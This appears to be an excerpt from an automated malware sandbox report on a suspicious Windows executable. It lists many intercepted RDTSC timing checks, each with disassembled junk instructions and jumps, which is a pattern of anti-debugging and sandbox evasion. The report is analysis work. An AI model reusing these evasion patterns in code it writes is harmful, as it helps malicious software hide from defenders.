Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 98398C second address: 983990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 983990 second address: 983996 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 983996 second address: 98399B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 98399B second address: 9839A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 983C8F second address: 983C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFD88CA6406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 983C99 second address: 983C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 983C9D second address: 983CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFD88CA6406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 98EFE6 second address: 98EFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD88B5ADBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 98EFFC second address: 98F000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 98F000 second address: 98F03D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBEh 0x00000007 jmp 00007EFD88B5ADC8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnl 00007EFD88B5ADBEh 0x00000014 popad 0x00000015 push ecx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99183D second address: 991847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD88CA6406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 991847 second address: 99184E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99184E second address: 991854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996A83 second address: 996A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996476 second address: 996487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA640Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996487 second address: 99648B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99648B second address: 996491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996491 second address: 9964BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007EFD88B5ADB8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD88B5ADC9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99660F second address: 996613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996613 second address: 996623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996623 second address: 996646 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD88CA641Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 996646 second address: 99664C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99BF1A second address: 99BF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD88CA640Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99BF32 second address: 99BF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88B5ADBFh 0x00000009 jp 00007EFD88B5ADB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 99BF4B second address: 99BF59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9A8594 second address: 9A85D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d jmp 00007EFD88B5ADBFh 0x00000012 pop edx 0x00000013 pushad 0x00000014 jmp 00007EFD88B5ADBEh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jmp 00007EFD88B5ADBDh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9A85D1 second address: 9A85DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9A85DA second address: 9A85E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFD88B5ADB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9A85E4 second address: 9A8602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9A8602 second address: 9A8608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9AB656 second address: 9AB65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B05D3 second address: 9B05D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B05D9 second address: 9B05DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B05DE second address: 9B05E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007EFD88B5ADB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B05E9 second address: 9B05F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007EFD88CA6406h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B08A5 second address: 9B08C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFD88B5ADBBh 0x00000013 jnc 00007EFD88B5ADB6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B0A08 second address: 9B0A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 jne 00007EFD88CA6406h 0x0000000f pop ebx 0x00000010 jmp 00007EFD88CA6415h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B0D13 second address: 9B0D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B0D17 second address: 9B0D3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007EFD88CA640Eh 0x0000000c jg 00007EFD88CA6406h 0x00000012 jnl 00007EFD88CA6406h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B1963 second address: 9B1969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9B1969 second address: 9B196D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9C60A2 second address: 9C60A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9C5F73 second address: 9C5F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9C5F77 second address: 9C5F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9C2865 second address: 9C286A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9D2BA3 second address: 9D2BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9D2BAE second address: 9D2BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD88CA6406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9D46F4 second address: 9D46FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9D46FC second address: 9D4701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9D4701 second address: 9D471C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD88B5ADC0h 0x00000008 pushad 0x00000009 jnc 00007EFD88B5ADB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA1DB second address: 9EA1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA1E1 second address: 9EA1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007EFD88B5ADB6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA1EE second address: 9EA222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007EFD88CA6406h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007EFD88CA6410h 0x0000001b jmp 00007EFD88CA640Bh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA3A6 second address: 9EA3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007EFD88B5ADB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007EFD88B5ADC2h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFD88B5ADC3h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA3DD second address: 9EA3E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA3E1 second address: 9EA3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EA3E7 second address: 9EA3FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFD88CA6406h 0x00000009 jg 00007EFD88CA6406h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAAA5 second address: 9EAAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD88B5ADB6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAAB0 second address: 9EAAB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAAB5 second address: 9EAADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007EFD88B5ADB6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007EFD88B5ADB6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f jo 00007EFD88B5ADB6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAADA second address: 9EAADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAADE second address: 9EAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD88B5ADC7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAAFB second address: 9EAB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAB01 second address: 9EAB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAB07 second address: 9EAB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAC6E second address: 9EAC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFD88B5ADC5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAC89 second address: 9EAC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EAC8D second address: 9EAC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDA45 second address: 9EDA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDA4E second address: 9EDA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDB43 second address: 9EDB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDB48 second address: 9EDB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDCD3 second address: 9EDCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDCDC second address: 9EDCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9EDFE1 second address: 9EDFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506021A second address: 5060220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060220 second address: 5060224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060224 second address: 5060277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007EFD88B5ADBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push ecx 0x00000013 mov esi, edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov edx, 39697F14h 0x0000001f pushfd 0x00000020 jmp 00007EFD88B5ADBDh 0x00000025 sbb si, F3D6h 0x0000002a jmp 00007EFD88B5ADC1h 0x0000002f popfd 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060277 second address: 506027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506027B second address: 5060281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060369 second address: 506036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506036D second address: 50603A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007EFD88B5ADBEh 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFD88B5ADC7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50603A2 second address: 50603D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6419h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFD88CA640Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50603D6 second address: 50603DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50603DA second address: 50603F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6419h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50603F7 second address: 5060407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88B5ADBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50604A1 second address: 50604A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50604A5 second address: 50604AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50604AB second address: 50604B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506052C second address: 5060549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ECh 0x00000005 mov dl, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD88B5ADC0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060549 second address: 506052C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007EFD88CA6414h 0x00000012 adc ecx, 72B7C718h 0x00000018 jmp 00007EFD88CA640Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007EFD88CA6418h 0x00000024 and si, B178h 0x00000029 jmp 00007EFD88CA640Bh 0x0000002e popfd 0x0000002f popad 0x00000030 jne 00007EFD88CA636Dh 0x00000036 mov al, byte ptr [edx] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFD88CA640Eh 0x0000003f rdtsc
